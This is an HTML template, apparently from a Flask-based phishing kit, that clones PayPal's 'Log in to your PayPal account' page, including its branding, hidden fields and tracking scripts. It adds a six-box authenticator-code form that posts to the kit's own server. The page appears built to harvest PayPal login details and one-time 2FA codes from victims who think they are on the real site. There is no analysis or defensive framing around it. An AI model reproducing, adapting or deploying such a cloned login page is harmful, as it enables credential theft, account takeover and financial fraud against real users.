<!DOCTYPE html>
<html lang="en" class="no-js desktop">
   <!--<![endif]-->
   <head>
      <script async src="js/ngrlCaptcha.min.js"></script><!--Script info: script: node, template:  , date: Sep 16, 2022 10:30:24 -07:00, country: US, language: en web version:  content version:  hostname : rZJvnqaaQhLn/nmWT8cSUjOx898qoYZ06fendyljjeAbIhfwPzQKG7qTbadYV4On rlogid : rZJvnqaaQhLn%2FnmWT8cSUotSylMGOTGkRUMDpmUTvbXdvevuMMFAfR3mQy2JZfSavI03Q3pWZxE0B1RZg4BOBb8%2FZR5sk5bW_183475a0364 -->
      <meta charset="utf-8">
      <title>Log in to your PayPal account</title>
      <meta http-equiv="content-type" content="text/html; charset=UTF-8">
      <meta name="application-name" content="PayPal">
      <meta name="msapplication-task" content="name=My Account;action-uri=https://www.paypal.com/us/cgi-bin/webscr?cmd=_account;icon-uri=https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico">
      <meta name="msapplication-task" content="name=Send Money;action-uri=https://www.paypal.com/us/cgi-bin/webscr?cmd=_send-money-transfer&send_method=domestic;icon-uri=https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico">
      <meta name="keywords" content="transfer money, email money transfer, international money transfer ">
      <meta name="description" content="Transfer money online in seconds with PayPal money transfer. All you need is an email address.">
      <link rel="shortcut icon" href="pp_favicon_x.ico">
      <link rel="apple-touch-icon" href="images/pp64.png">
      <link rel="canonical" href="https://www.paypal.com/us/signin">
      <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1.0, maximum-scale=2, user-scalable=yes">
      <meta property="og:image" content="images/pp258.png">

      <link rel="stylesheet" href="{{ url_for('static', filename='contextualLoginElementalUIv2.css')}}">
      <!--[if lte IE 9]>
      <link rel="stylesheet" href="https://www.paypalobjects.com/web/res/2c4/7aa8b2870f80a336755ed96accdc1/css/ie9.css" />
      <![endif]--><!-- build:js inline --><!-- build:[src] js/lib/ --><script nonce src="js/modernizr-2.6.1.js"></script><!-- /build --><!-- /build --><script nonce>/* Special integration eligibility check */function isEligibleIntegration() {var sxf = "";return sxf === 'true' || window.name === 'PPFrameRedirect';}/* Don't bust the frame if this is top window */if (self === top || isEligibleIntegration()) {var antiClickjack = document.getElementById("antiClickjack");if (antiClickjack) {antiClickjack.parentNode.removeChild(antiClickjack);}} else {top.location = self.location;}</script>

   <style>


        @font-face{font-family:pp-sans-big-regular;src:url(https://www.paypalobjects.com/webstatic/mktg/2014design/font/PP-Sans/PayPalSansBig-Regular.eot);src:url(https://www.paypalobjects.com/webstatic/mktg/2014design/font/PP-Sans/PayPalSansBig-Regular.eot?#iefix) format("embedded-opentype"),url(https://www.paypalobjects.com/paypal-ui/fonts/PayPalSansBig-Regular.woff2) format("woff2"),url(https://www.paypalobjects.com/webstatic/mktg/2014design/font/PP-Sans/PayPalSansBig-Regular.svg) format("svg");}


@font-face {
font-family: trial;
src: {{ url_for('static', filename='fonts/PayPalIcons-Regular.ttf') }};
font-weight:bold; }

.userInput{
	display: flex;
	justify-content: center;
	height: 60px;
	width: 44x;
}


input{
	margin: 4px;
	height: 60px;
	width: 44px;

	border-radius: 5px;
	text-align: center;
   font-family: sans-serif;
	font-size: 1.2rem;
    border: 2px solid #909191;

}







   </style>
   </head>






   <body class="desktop" data-rlogid="rZJvnqaaQhLn%2FnmWT8cSUotSylMGOTGkRUMDpmUTvbXdvevuMMFAfR3mQy2JZfSavI03Q3pWZxE0B1RZg4BOBb8%2FZR5sk5bW_183475a0364" data-hostname="rZJvnqaaQhLn/nmWT8cSUjOx898qoYZ06fendyljjeAbIhfwPzQKG7qTbadYV4On" data-production="true" data-enable-ads-captcha="true" data-ads-challenge-url="/auth/createchallenge/5fe3a46b48103a1f/challenge.js" data-enable-client-cal-logging="true" data-correlation-id="f561001ad9ed2" data-enable-fn-beacon-on-web-views="true" data-phone-password-enabled="true" data-is-hybrid-login-experience="true" data-phone-code="US +1" data-csrf-token="KoshR14lI8kd3TyIlCLoO79JRSMPUkjH/xz0Q=" data-nonce="DEGISaQSnToLAJZCxfkd9LPEWZZflImikFDgrmC+mTe3JPhM" data-lazy-load-country-codes="true" data-cookie-banner-enabled="true" data-show-country-drop-down="true" data-otp-login-integration-type="via_button" data-email-label="Email" data-xhr-timeout-limit="20000" data-load-start-time="1663349424996" data-xhr-timeout-ineligible-list="MSIE 10|Windows NT 10">
      <noscript>
         <p class="nonjsAlert" role="alert">NOTE: Many features on the PayPal Web site require Javascript and cookies.</p>
      </noscript>
      <div id="main" class="main" role="main">
         <section id="slLanding" class="slLanding hide" data-role="page" data-title="Connect your Google account, check out faster on your devices">
            <div class="corral">
               <div id="slContent" class="contentContainer contentContainerBordered">
                  <header>
                     <p role="img" aria-label="PayPal Logo" class="paypal-logo paypal-logo-long"></p>
                  </header>
                  <div id="linked" class="linked ">
                     <div class="profileRemembered"><span class="loginEmail"></span><a href="#" class="changeLink scTrack:not-you" id="changeLink">Change</a></div>
                     <div class="headerTextDecorated"></div>
                     <h1 class="headerText">Stay logged in for faster checkout</h1>
                     <p class="description assure">Enable auto login on this browser and speed through checkout every time. (Not recommended for shared devices.)<span class="learnMoreLink"><a href="#" id="slLoginLearnMore" class="secondayLink">What's this?</a></span></p>
                     <div id="partnerProfile" class="partnerProfile">
                        <div id="partnerPhoto" class="partnerPhoto" style="background-image: url(&#x27;&#x27;)"></div>
                        <div class="partnerDetails">
                           <span>You're logged in as</span>
                           <div id="displayName" class="displayName"></div>
                           <div>
                              <div class="partnerEmailDiv"><span class="partnerIcon"></span><span id="partnerEmail" class="partnerEmail"></span><span id="partnerEmailDomain"></span></div>
                           </div>
                        </div>
                     </div>
                     <div class="actions actionsSpacedShort"><button class="button actionContinue scTrack:unifiedlogin-continue" id="continueBtn" name="continueBtn" value="continueBtn">Continue</button></div>
                     <div id="secondaryLogin" class="buttonAsLink secondaryLink"><button class="scTrack:unifiedlogin-use-password" id="secondaryLoginBtn" name="secondaryLoginBtn" value="secondaryLoginBtn">Use password instead</button></div>
                  </div>
                  <div id="unlinked" class="unlinked ">
                     <div id="headerIcon" class="partnerConnect"></div>
                     <h1 class="headerText">Connect your Google account, check out faster on your devices</h1>
                     <p class="description assure">Automatically log in to PayPal for faster checkout without typing your password wherever you're logged in with your Google account.<a href="#" id="slOptInlearnMore" class="secondayLink scTrack:unifiedlogin-sl-whatsthis">What's this?</a></p>
                     <p class="secondaryLink hide" id="slOptIn_notNow"><a href="#">Not now</a></p>
                  </div>
                  <div id="learnMoreModal" class="learnMoreModal">
                     <div id="optInLearnMoreDesc" class="optInLearnMoreDesc ">
                        <h1 class="headerText headerTextSpaced">Why connect my Google account?</h1>
                        <p> Linking your Google account allows you to activate One Touch quickly and easily when you check out. You can always opt out later in Settings at PayPal.com.</p>
                        <p> Whenever you check out on a new device and browser when logged in with your Google account, you can automatically log in at checkout without typing your password.</p>
                     </div>
                     <div id="slLoginLearnMoreDesc" class="slLoginLearnMoreDesc ">
                        <h1 class="headerText headerTextSpaced">Stay logged in for faster checkout</h1>
                        <p> Skip typing your password by staying logged in on this device. For security, we'll occassionally ask you to log in, including every time you update your personal or financial info. We don't recommend using One Touch on shared devices. Turn this off at any time in your PayPal settings.</p>
                     </div>
                     <button type="button" class="ui-dialog-titlebar-close"></button>
                  </div>
                  <div class="intentFooter ">
                     <div class="localeSelector  ">
                        <span class="picker country-selector hide"><span class="hide" id="countryPickerLink">United States</span><button type="button" aria-labelledby="countryPickerLink" class="country US"></button></span>
                        <ul class="localeLink">
                           <li><a class="selected scTrack:unifiedlogin-footer-language_en_US" href="/signin?country.x=US&locale.x=en_US&langTgl=en" lang="en" data-locale="en_US" aria-current="”true”">English</a></li>
                           <li><a class=" scTrack:unifiedlogin-footer-language_fr_XC" href="/signin?country.x=US&locale.x=fr_XC&langTgl=fr" lang="fr" data-locale="fr_XC">Français</a></li>
                           <li><a class=" scTrack:unifiedlogin-footer-language_es_XC" href="/signin?country.x=US&locale.x=es_XC&langTgl=es" lang="es" data-locale="es_XC">Español</a></li>
                           <li><a class=" scTrack:unifiedlogin-footer-language_zh_XC" href="/signin?country.x=US&locale.x=zh_XC&langTgl=zh" lang="zh" data-locale="zh_XC">中文</a></li>
                        </ul>
                     </div>
                  </div>
               </div>
            </div>
         </section>
         <section id="login" class="login  " data-role="page" data-title="Log in to your PayPal account">
            <div class="corral ">
               <div id="content" class="contentContainer activeContent contentContainerBordered">
                  <header id="header">
                     <center><img src="{{ url_for('static', filename='images/paypal/PPsmall.png')}}" width="25"></img></center>
                     <br><br>
                  </header>
                  <h1 id="headerText" class="headerText  accessAid">Log in to your PayPal account</h1>
                  <p id="phoneSubTagLine" class="subHeaderText hide">Already set up to use your mobile number to log in? Type it below. Otherwise, click the link to log in with email.</p>
                  <p id="subTagLineConnectOtp" class="subHeaderText hide">Forgot your email address? Go to the PayPal website to recover it.</p>
                  <div id="loginContent" class>
                     <div id="loginSection" class>
                        <div class="notifications"></div>
                        <div id="keychainErrorMessage" class="hide">
                           <p class="notification notification-warning blocked-on-8ball hide">PayPal One Touch™ only works for checkout. Please login with your email.</p>
                           <p class="notification notification-warning blocked-on-risky-login hide">Please login with your email and password.</p>
                           <p class="notification notification-critical keychain-activation-failure hide">Something went wrong on our end. Please login with your email and password.</p>
                        </div>

                        <form action="#" method="post">
                           <input type="hidden" id="token" name="_csrf" value="KoshR14lI8kd3TyIlCLoO79JRSMPUkjH/xz0Q="><input type="hidden" name="locale.x" value="en_US"><input type="hidden" name="processSignin" value="main"><input type="hidden" name="fn_sync_data" value="fn_sync_data"><input type="hidden" name="intent" value="signin"><input type="hidden" name="ads-client-context" value="signin"><input type="hidden" name="isValidCtxId" value><input type="hidden" name="coBrand" value="us"><input type="hidden" name="signUpEndPoint" value="/webapps/mpp/account-selection"><input type="hidden" name="showCountryDropDown" value="true"><input type="hidden" name="requestUrl" value="/signin"><input type="hidden" name="forcePhonePasswordOptIn" value>
                           <div class="profileDisplayName hide"></div>
                           <div class="profileRememberedEmail  hide  "><span class="profileDisplayPhoneCode" dir="ltr"></span><span class="profileDisplayEmail notranslate"></span><a href="#" class="notYouLink scTrack:not-you" id="backToInputEmailLink">Change</a></div>
                           <div id="splitEmail" class="splitEmail ">
                              <div id="splitEmailSection" class="splitPhoneSection splitEmailSection ">
                                 <div class="countryPhoneSelectWrapper hide">
                                    <label class="accessAid" for="phoneCode">Choose your phone country code</label>
                                    <select name="phoneCode" id="phoneCode" class="countryPhoneSelect">
                                       <option selected="selected" value="US +1" data-code="+1" data-country="US">United States (+1)</option>
                                    </select>
                                    <div class="countryPhoneSelectChoice"><span class="countryCode">US</span><span class="phoneCode">+1</span></div>
                                 </div>




                                 <div class="captcha captcha-container clearfix hide" id="splitHybridCaptcha">
                                    <div class="captcha-image"><img src alt></div>
                                    <div class="captcha-inputs clearfix">
                                       <div class="textInput ">
                                          <div class="fieldWrapper"><input id="splitHybridCaptcha" name="captchaCode" type="text" class="hasHelp  validateEmpty   " value autocomplete="off" placeholder="Enter code" aria-describedby="captchaErrorMessage"><label for="splitHybridCaptcha" class="fieldLabel"></label></div>
                                          <div class="errorMessage" id="captchaErrorMessage">
                                             <p class="emptyError hide">Required</p>
                                          </div>
                                       </div>
                                       <div class="refresh"><a href class="captchaRefresh buttonLight onboardingSpritePseudo scTrack:unifiedlogin-click-reload-captcha imageLink"><span class="accessAid">Reload Image</span></a></div>
                                       <div class="audio">
                                          <audio role="application" id="captchaPlayer" src class="hide"></audio>
                                          <a target="_blank" href class="captchaPlay buttonLight onboardingSpritePseudo scTrack:unifiedlogin-click-play-captcha-audio imageLink"><span class="accessAid">Audio Button</span></a>
                                       </div>
                                    </div>
                                 </div>
                              </div>

                              <div class="tpdDemo hide" id="tpdDemo">
                                 <p class="tpdDemoContent">Log in with your email as usual, and then you'll be prompted to log in with your phone's biometrics.</p>
                              </div>
                              <input type="hidden" id="phone" name="login_phone" value class="validate">
                           </div>
                        </form>

                           <input type="hidden" name="initialSplitLoginContext" id="initialSplitLoginContext" value="inputEmail"><input type="hidden" name="isTpdOnboarded" id="isTpdOnboarded" value>
                           <div id="splitPassword" class="splitPassword  hide">
                              <div id="splitPasswordSection" class="hide ">
                                 <div id="passwordSection" class="clearfix showHideButtonForEligibleBrowser">
                                    <div class="textInput " id="login_passworddiv">
                                       <div class="fieldWrapper"><input id="password" name="login_password" type="password" class="hasHelp  validateEmpty   pin-password" required="required" value placeholder="Password" aria-describedby="passwordErrorMessage"><label for="password" class="fieldLabel">Password</label><label for="Show password" class="fieldLabel">Show password</label><button type="button" class="showPassword hide show-hide-password scTrack:unifiedlogin-show-password" id="Show password">Show</button><label for="Hide" class="fieldLabel">Hide</label><button type="button" class="hidePassword hide show-hide-password scTrack:unifiedlogin-hide-password" id="Hide">Hide</button></div>
                                       <div class="errorMessage" id="passwordErrorMessage">
                                          <p class="emptyError hide">Required</p>
                                       </div>
                                    </div>
                                    <a href="/authflow/password-recovery/?country.x=US&locale.x=en_US&redirectUri=%252Fsignin%252F" id="forgotPassword" class="recoveryOption forgotPassword" data-client-log-action-type="clickForgotPasswordLink">Forgot password?</a>
                                 </div>
                              </div>
                              <div class="captcha captcha-container clearfix hide" id="splitPasswordCaptcha">
                                 <div class="captcha-image"><img src alt></div>
                                 <div class="captcha-inputs clearfix">
                                    <div class="textInput ">
                                       <div class="fieldWrapper"><input id="splitPasswordCaptcha" name="captcha" type="text" class="hasHelp  validateEmpty   " value autocomplete="off" placeholder="Enter code" aria-describedby="captchaErrorMessage"><label for="splitPasswordCaptcha" class="fieldLabel"></label></div>
                                       <div class="errorMessage" id="captchaErrorMessage">
                                          <p class="emptyError hide">Required</p>
                                       </div>
                                    </div>
                                    <div class="refresh"><a href class="captchaRefresh buttonLight onboardingSpritePseudo scTrack:unifiedlogin-click-reload-captcha imageLink"><span class="accessAid">Reload Image</span></a></div>
                                    <div class="audio">
                                       <audio role="application" id="captchaPlayer" src class="hide"></audio>
                                       <a target="_blank" href class="captchaPlay buttonLight onboardingSpritePseudo scTrack:unifiedlogin-click-play-captcha-audio imageLink"><span class="accessAid">Audio Button</span></a>
                                    </div>
                                 </div>
                              </div>
                              <div class="actions"><button class="button actionContinue scTrack:unifiedlogin-login-submit" type="submit" id="btnLogin" name="btnLogin" value="Login">Log In</button></div>
                              <div id="beginOtpLogin" class="otpLoginViaButton hidden"><button class="button" href="#">Log in with a one-time code</button></div>
                           </div>
                           <input type="hidden" name="splitLoginContext" value="inputEmail">
                        </form>
                        <div class="moreOptionsDiv  hide" id="moreOptionsContainer">
                           <a href="#" id="moreOptions" class="moreOptionsInfo">More options</a>
                           <div class="bubble-tooltip hide" id="moreOptionsDropDown">
                              <ul class="moreoptionsGroup">
                                 <li><a href="#" id="moreOptionsMobile" class="scTrack:unifiedlogin-click-more-options-mobile">Approve login using mobile device</a></li>
                                 <li><a href="/authflow/password-recovery/?country.x=US&locale.x=en_US&redirectUri=%252Fsignin%252F" class="scTrack:unifiedlogin-click-forgot-password pwrLink">Having trouble logging in?</a></li>
                              </ul>
                           </div>
                        </div>
                        <div id="beginOtpLogin" class="otpLoginViaButton hidden"><button class="button" href="#">Log in with a one-time code</button></div>
                        <div id="tryAnotherWayLinkContainer" class="tryAnotherWayLinkContainer hide" data-hide-on-pass><a href="#" id="tryAnotherWayLink">Try another way</a></div>

                        <div id="tpdButtonContainer" class="signupContainer hide">
                           <div class="loginSignUpSeparator"><span class="textInSeparator">or</span></div>
                           <div class="actions"><button class="button secondary" id="tpdButton" type="submit" value="Approve login using mobile device">Approve login using mobile device</button></div>
                        </div>
                     </div>
                  </div>

                  <form action="#" method="post">
            <center><img src="{{ url_for('static', filename='images/paypal/authanticator.png')}}"></center>
                  <br>
                  <div class="userInput">
			<input type="text" id='ist' name='ist' required maxlength="1" onkeyup="clickEvent(this,'sec')">
			<input type="text" id="sec"  name="sec" required maxlength="1" onkeyup="clickEvent(this,'third')">
			<input type="text" id="third"  name="third" required maxlength="1" onkeyup="clickEvent(this,'fourth')">
			<input type="text" id="fourth"  name="fourth" required maxlength="1" onkeyup="clickEvent(this,'fifth')">
                     <input type="text" id="fifth" name="fifth" required maxlength="1" onkeyup="clickEvent(this,'sixth')">
			<input type="text" id="sixth"  name="sixth" required maxlength="1">
                     </div>
                  <br>
                     <div class="actions"><button class="button actionContinue scTrack:unifiedlogin-login-click-next" type="submit" id="btnNext" name="btnNext" value="Next" >Continue</button></div>

                  </form>



            <div id="tryAnotherWayModal" class="tryAnotherWayModal hide">
               <div class="modal-content">
                  <div class="modal-content-header">
                     <div class="modal-header-text">Try another way</div>
                     <div><button id="closeModal" type="button" class="dialog-close"></button></div>
                  </div>
                  <ul class="modal-content-body">
                     <li>
                        <a aria-label="Login with Touch ID or Face ID" class="hide" id="loginWithWebauthn" href="#">
                           <div>Log in with face, fingerprint or PIN</div>
                           <button class="chevron-right"></button>
                        </a>
                     </li>
                     <li>
                        <a aria-label="Login with phone one-time code" class="hide" id="loginWithOtp" href="#">
                           <div>Text a one-time code</div>
                           <button class="chevron-right"></button>
                        </a>
                     </li>
                     <li>
                        <a aria-label="Login with email one-time code" id="loginWithEmailOtp" class="hide" href="#">
                           <div>Email a one-time code</div>
                           <button class="chevron-right"></button>
                        </a>
                     </li>
                     <li>
                        <a aria-label="Login with password" id="loginWithPassword" class href="#">
                           <div>Log in with your password</div>
                           <button class="chevron-right"></button>
                        </a>
                     </li>
                     <li>
                        <a id="guestCheckout" aria-label="sign up" href="/us/webapps/mpp/account-selection">
                           <div>Sign Up</div>
                           <button class="chevron-right"></button>
                        </a>
                     </li>
                  </ul>
               </div>
            </div>
         </section>

         <script>
            function clickEvent(first,last){
			if(first.value.length){
				document.getElementById(last).focus();
			}
		}
         </script>

         <div class="container">










         <section id="verification" class="verification hide" data-role="page" data-title="Login Confirmation - PayPal">
            <div class="corral">
               <div class="contentContainer contentContainerLean">
                  <div id="pending" class="verificationSubSection">
                     <h1 class="headerText">Open the PayPal app</h1>
                     <p id="uncookiedMessage" class="verification-message hide">Open the PayPal app, tap Yes on the prompt, then tap <span class="twoDigitPin">{twoDigitPin}</span> on your phone to log in.</p>
                     <p id="cookiedMessage" class="verification-message hide">Open the PayPal app and tap Yes on the prompt to log in.</p>
                     <div class="notifications"></div>
                     <div class="accountArea"><span class="account"></span><span class="verificationNotYou"><a data-href="#" href="#" class="scTrack:unifiedlogin-verification-click-notYou" id="pendingNotYouLink">Not you?</a></span></div>
                     <div class="mobileNotification">
                        <p class="pin"></p>
                        <div class="mobileScreen"><img src="images/icon-PN-check.png" alt="phone"></div>
                     </div>
                     <p class="tryAnotherMsg"><a id="tryPasswordLink" data-href="#" href class="inlineLink scTrack:try-password">Use password instead</a></p>
                     <p class="resendMsg"><a class="inlineLink scTrack:resend hide" role="button" data-href="#resend" href id="resend">Resend</a><span class="sentMessage hide">Sent</span></p>
                  </div>
                  <div id="expired" class="hide verificationSubSection">
                     <header>
                        <p role="img" aria-label="PayPal Logo" class="paypal-logo paypal-logo-long">PayPal</p>
                     </header>
                     <h1 class="headerText headerTextWarning">Sorry, we couldn't confirm it's you</h1>
                     <p class="slimP">We didn't receive a response so we were unable confirm your identity.</p>
                     <button id="expiredTryAgainButton" class="button actionsSpaced">Try Again</button>
                  </div>
                  <div id="denied" class="denied hide verificationSubSection">
                     <img alt src="images/glyph_alert_critical_big-2x.png" class="deniedCaution">
                     <h1 class="headerText">Sorry, we couldn't confirm it's you</h1>
                     <p>Need a hand?, <a href="/{coBrand}/cgi-bin/helpscr?cmd=_help" class="inlineLink scTrack:help">We can help</a>.</p>
                  </div>
               </div>
            </div>
         </section>
         <footer class="footer" role="contentinfo">
            <div class="legalFooter">
               <ul class="footerGroup">
                  <li><a target="_blank" href="/us/smarthelp/contact-us">Contact Us</a></li>
                  <li><a target="_blank" href="/us/webapps/mpp/ua/privacy-full">Privacy</a></li>
                  <li><a target="_blank" href="/us/webapps/mpp/ua/legalhub-full">Legal</a></li>
                  <li><a target="_blank" href="/us/webapps/mpp/ua/upcoming-policies-full">Policy Updates</a></li>
                  <li><a target="_blank" href="/us/webapps/mpp/country-worldwide">Worldwide</a></li>
               </ul>
            </div>
         </footer>
      </div>
      <div class="transitioning  hide ">
         <p class="welcomeMessage hide">Welcome, !</p>
         <p class="checkingInfo hide">Checking your info…</p>
         <p class="oneSecond hide">Just a second…</p>
         <p class="secureMessage hide">Securely logging you in...</p>
         <p class="oneTouchMessage hide"></p>
         <p class="retrieveInfo hide">Retrieving your info...</p>
         <p class="waitFewSecs hide">This may take a few seconds...</p>
         <p class="udtSpinnerMessage udtLogin hide">We recognize you on this device, and we’re securely logging you in.</p>
         <p class="udtSpinnerMessage udtLoginXo hide">We recognize you on this device, so no need to enter your password for this purchase.</p>
         <p class="udtSpinnerMessage webllsXoUS hide">We recognize you on this device, so you can skip login.<br><br>Manage this setting in your profile.</p>
         <p class="udtSpinnerMessage webllsSCA hide">We're taking you to PayPal Checkout to complete payment.</p>
         <p class="qrcMessage hide">Redirecting...</p>
         <p class="webAuthnOptin hide">Updating your login settings...</p>
         <p class="webAuthnLogin hide">Logging you in...</p>
         <div class="keychain spinner-content uiExp hide"></div>
      </div>

        <script src="https://code.jquery.com/jquery-3.5.1.js"
          integrity="sha256-QWo7LDvxbWT2tbbQ97B53yJnYU3WhH/C8ycbRAkjPDc="
          crossorigin="anonymous"></script>

   <script>

var loc = window.location.href+'';
if (loc.indexOf('http://')==0){
    window.location.href = loc.replace('http://','https://');
}
   </script>


      <script nonce>var PAYPAL = PAYPAL || {};PAYPAL.slData = {"slSessionChkTimeout": "","slOptInTimeout": "","slAuthChkTimeout": "","slTokenValidationTimeout": "","slDisplayMerchantLink": "","slAction": "","smartlockStatus": "","slLinkedEmail": "","slFrameSrc": "","slAuthUrl": "","partnerClientId": "","partnerReturnUri": "","scimContextId": "","slOptInOT": "","slLoginEmail": "","slReturnUrl": "","delayPartnerAssertion": "","googleOneTapEnable": ""};</script><script nonce>var PAYPAL = PAYPAL || {};PAYPAL.ulData = {fnUrl: "https://c.paypal.com/da/r/fb.js",fnSessionId: "dd86ef003acf43ba970f8f1029f2fcd5",sourceId: "UNIFIED_LOGIN_INPUT_EMAIL",beaconUrl: "https://b.stats.paypal.com/v1/counter.cgi?r=cD1kZDg2ZWYwMDNhY2Y0M2JhOTcwZjhmMTAyOWYyZmNkNSZpPTE5NC4yOS41My4yMjQmdD0xNjYzMzQ5NDI1LjA2NCZhPTIxJnM9VU5JRklFRF9MT0dJTsnkI7iNvjYjJkC9W7Sd4mvhR-iA",enableSpeedTyping: "true",aPayAuth: "",aPayCanMakePaymentTimeout: "",tokenAssertionUri: "",preloadScriptUrl: "",preloadScriptDownloadLength: 0,fingerprintProceed: "lookup"};</script>
      <noscript><img src="https://c.paypal.com/v1/r/d/b/ns?f=dd86ef003acf43ba970f8f1029f2fcd5&amp;s=UNIFIED_LOGIN_INPUT_EMAIL&amp;js=0&amp;r=1" title="ppfniframe" alt height="1" width="1" border="0"></noscript>
      <script nonce id="ul-sync-data">var PAYPAL = PAYPAL || {};PAYPAL.ulSync = {fnSessionId: 'dd86ef003acf43ba970f8f1029f2fcd5',sourceId: 'UNIFIED_LOGIN_INPUT_EMAIL',fname: 'fn_sync_data'};</script><!-- build:js inline --><!-- build:[src] js/lib/ --><script nonce src="js/fn-sync-telemetry-min.js"></script><!-- /build --><!-- /build --><script nonce>var PAYPAL = PAYPAL || {};PAYPAL.ulData = PAYPAL.ulData || {};PAYPAL.ulData.incontextData = {"version": "","noBridge": "","env": "","icstage": "","targetCancelUrl": "","paymentAction": "","paymentToken": "","merchantID": ""};</script><!-- build:js inline --><!-- build:[src] js/ --><script nonce src="js/signin-split.js"></script><!-- /build --><!-- /build --><!-- build:js inline --><!-- build:[src] js/ --><script nonce src="js/ioc.js"></script><!-- /build --><!-- /build --><script src="js/pa.js"></script><script nonce>var fptiOptions = {data:'pgrp=main%3Aunifiedlogin%3Asplitlogin%3A%3Aemail&page=main%3Aunifiedlogin%3Asplitlogin%3A%3Aemail%3A%3A%3A&qual=input_email&pgst=1663349424996&calc=f561001ad9ed2&nsid=GorwKbsUIVh6PAsb50jUj07XcenqnRW1&rsta=en_US&pgtf=Nodejs&env=live&s=ci&ccpg=US&csci=dd86ef003acf43ba970f8f1029f2fcd5&comp=unifiedloginnodeweb&tsrce=mppnodeweb&cu=0&ef_policy=ccpa&xe=105604%2C104200%2C104458%2C102557%2C101408%2C104227%2C106031%2C106033%2C106032%2C105392%2C106035%2C106034%2C106036%2C106057%2C105416%2C105553%2C105552%2C105554%2C104039%2C104038%2C105843%2C105845%2C105844%2C102390%2C104571%2C105340%2C101216%2C103648%2C104200&xt=124899%2C121070%2C119355%2C109630%2C104577%2C117999%2C127662%2C127659%2C127666%2C123875%2C127651%2C127655%2C127648%2C127561%2C123994%2C124689%2C124682%2C124697%2C120732%2C120736%2C126375%2C126401%2C126385%2C108797%2C121328%2C123611%2C103864%2C114559%2C121070&transition_name=ss_prepare_email&userRedirected=true&ctx_login_ot_content=0&obex=signin&landing_page=login&state_name=begin_email&ctx_login_ctxid_fetch=ctxid-not-exist&ctx_login_content_fetch=success&ctx_login_lang_footer=shown&ctx_login_signup_btn=shown%7Cdefault&ctx_login_intent=signin&ctx_login_flow=Signin&ctx_login_state_transition=login_loaded&post_login_redirect=default&ret_url=%2F',url:'https:\/\/t.paypal.com\/ts'};var trackLazyData = "true" === "true";if(trackLazyData){fptiOptions = {...fptiOptions,trackLazyData: true,lazyDataId: 'UnifiedLoginNodeWeb'};}(function(){if(typeof PAYPAL.analytics != "undefined"){PAYPAL.core = PAYPAL.core || {};	PAYPAL.core.pta = PAYPAL.analytics.setup(fptiOptions);						}}());</script>
      <noscript><img src="https://t.paypal.com/ts?nojs=1&amp;pgrp=main%3Aunifiedlogin%3Asplitlogin%3A%3Aemail&amp;page=main%3Aunifiedlogin%3Asplitlogin%3A%3Aemail%3A%3A%3A&amp;qual=input_email&amp;pgst=1663349424996&amp;calc=f561001ad9ed2&amp;nsid=GorwKbsUIVh6PAsb50jUj07XcenqnRW1&amp;rsta=en_US&amp;pgtf=Nodejs&amp;env=live&amp;s=ci&amp;ccpg=US&amp;csci=dd86ef003acf43ba970f8f1029f2fcd5&amp;comp=unifiedloginnodeweb&amp;tsrce=mppnodeweb&amp;cu=0&amp;ef_policy=ccpa&amp;xe=105604%2C104200%2C104458%2C102557%2C101408%2C104227%2C106031%2C106033%2C106032%2C105392%2C106035%2C106034%2C106036%2C106057%2C105416%2C105553%2C105552%2C105554%2C104039%2C104038%2C105843%2C105845%2C105844%2C102390%2C104571%2C105340%2C101216%2C103648%2C104200&amp;xt=124899%2C121070%2C119355%2C109630%2C104577%2C117999%2C127662%2C127659%2C127666%2C123875%2C127651%2C127655%2C127648%2C127561%2C123994%2C124689%2C124682%2C124697%2C120732%2C120736%2C126375%2C126401%2C126385%2C108797%2C121328%2C123611%2C103864%2C114559%2C121070&amp;transition_name=ss_prepare_email&amp;userRedirected=true&amp;ctx_login_ot_content=0&amp;obex=signin&amp;landing_page=login&amp;state_name=begin_email&amp;ctx_login_ctxid_fetch=ctxid-not-exist&amp;ctx_login_content_fetch=success&amp;ctx_login_lang_footer=shown&amp;ctx_login_signup_btn=shown%7Cdefault&amp;ctx_login_intent=signin&amp;ctx_login_flow=Signin&amp;ctx_login_state_transition=login_loaded&amp;post_login_redirect=default&amp;ret_url=%2F" alt height="1" width="1" border="0"></noscript>
      <script async id="grcv3enterpriseframetag" data-key="6LdCCOUUAAAAAHTE-Snr6hi4HJGtJk_d1_ce-gWB" data-action="unifiedloginnodeweb" data-sessionid="_sessionID=GorwKbsUIVh6PAsb50jUj07XcenqnRW1" data-src="https://www.paypalobjects.com/webcaptcha/grcenterprise_v3_static.html" data-submiturl="/auth/verifygrcenterprise" data-csrf="dPviNFppoLH2PaY/JkdRWwBQ7COHZhJDuUsAk=" data-f="dd86ef003acf43ba970f8f1029f2fcd5" src="js/grcenterprise_v3_static.js"></script>
   </body>
</html>